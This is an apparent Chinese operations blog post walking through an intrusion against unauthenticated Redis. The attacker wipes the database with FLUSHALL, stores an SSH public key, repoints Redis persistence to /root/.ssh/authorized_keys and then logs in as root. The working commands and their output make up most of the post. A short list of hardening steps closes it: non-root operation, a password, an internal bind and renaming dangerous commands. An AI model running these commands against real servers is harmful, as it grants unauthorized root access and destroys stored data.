IT博客 京ICP备14047844号

这根据redis持久化可生成文件，而且redis可以指定生成文件的位置和名称的bug下，恰巧你的redis里面只有一个key而且是一个ssh公钥，而且你指定持久化文件名“authorized_keys”生成位置是“/root/.ssh/”，这样那个拥有私钥的人就可以无密钥登录root了

1.生成密钥

[root@saltstack-node2~]# (echo -e "\n\n";cat .ssh/id_rsa.pub;echo "\n\n")
>/tmp/foo.txt
[root@saltstack-node2~]# cat /tmp/foo.txt

ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA0rfmYdQvgw/fmrKMj2nRV5FMucTAlv+J49Yu2MRsC9v0ORkesquGShvM/KuIM0P4yMS/l5/N/AzC3X76QJm3XeckuZdpo7KhZGuWGb76n4LrDf1UekagYW7dmW9f2WXnRrxnhl64N3DOeH9A2mD/mRrNrrJ+yyVUjbG9fM+FzOU8mYf7rqvLzqO2ppHYpPj9T5sR8E4bZpYBCQT9JXlA1N3y48LUGUqE5AuUKYEc6wyJCvPxaPWa8Ss03+zaVyF7ly+dje+3sDF1n8DvwveLaXV8BPfGB5bVG4kEtIhiWmWR+ITnLyzLzle2292+BtgfOrKOopk8TlBIhjVzl1LOJQ==
root@xxx.example.com
\n\n

2.清空redis
清空redis：

127.0.0.1:6379>
FLUSHALL
OK

3.写一个key

[root@saltstack-node2~]# cat /tmp/foo.txt |redis-cli -x set pwn
OK

4.对已知redis进行修改配置

127.0.0.1:6379>
CONFIG set dir /root/.ssh
OK
127.0.0.1:6379>config set dbfilename "authorized_keys"
OK
127.0.0.1:6379>
save
OK
127.0.0.1:6379>
exit

5.可以登录了

[root@saltstack-node2~]# ssh 192.168.81.129
The authenticity of
host '192.168.81.129 (192.168.81.129)' can't be established.
RSA key fingerprint
is 7d:c4:f0:37:1e:ba:da:90:56:8b:fa:ee:df:d0:3f:22.
Are you sure you
want to continue connecting (yes/no)? yes
Warning: Permanently
added '192.168.81.129' (RSA) to the list of known hosts.
Last login: Wed Nov
11 03:18:23 2015 from 192.168.81.1
[root@saltstack-node2~]#

预防措施：
1.不以root或者其它可登录用户启动（用低级权限启动）

2.修改配置增加密码认证
requirepass password

3.绑定内网IP不对外访问
bind 192.168.0.5

4.去除redis里面可进行系统入侵的命令

rename command
FLUSHALL ""
rename command
FLUSHDB ""
rename command
CONFIG
rename command EVAL

微信扫描二维码了解更多 ->

[运维博客]
redis的一次持久化入侵 http://new.nginxs.net/read.php/hello-world/